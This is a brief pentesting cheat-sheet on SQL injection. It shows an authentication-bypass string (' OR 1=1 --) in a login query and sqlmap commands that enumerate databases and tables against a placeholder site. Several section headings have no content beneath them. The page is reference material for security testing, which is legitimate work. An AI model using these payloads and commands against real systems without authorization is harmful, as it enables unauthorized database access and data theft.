SQL Injection

execute("SELECT * FROM users WHERE 
         username = 'admin' AND 
         password = '' OR 1=1 --'")

SQL Map

Basic commands:

Enumeration commands:

These options can be used to enumerate the back-end database management system information, structure, and data contained in tables.

Operating System access commands

These options can be used to access the back-end database management system on the target operating system.

Examples

sqlmap -u https://testsite.com/page.php?id=7 --dbs    \\Simple http
sqlmap -r req.txt -p blood_group --dbs
sqlmap -r <request_file> -p <vulnerable_parameter> --dbs

Using GET based Method

sqlmap -u https://testsite.com/page.php?id=7 -D blood --tables
sqlmap -u https://testsite.com/page.php?id=7 -D <database_name> --tables

Using POST based Method

sqlmap -r req.txt -p blood_group -D blood --tables
sqlmap -r req.txt -p <vulnerable_parameter> -D <database_name> --tables

Last updated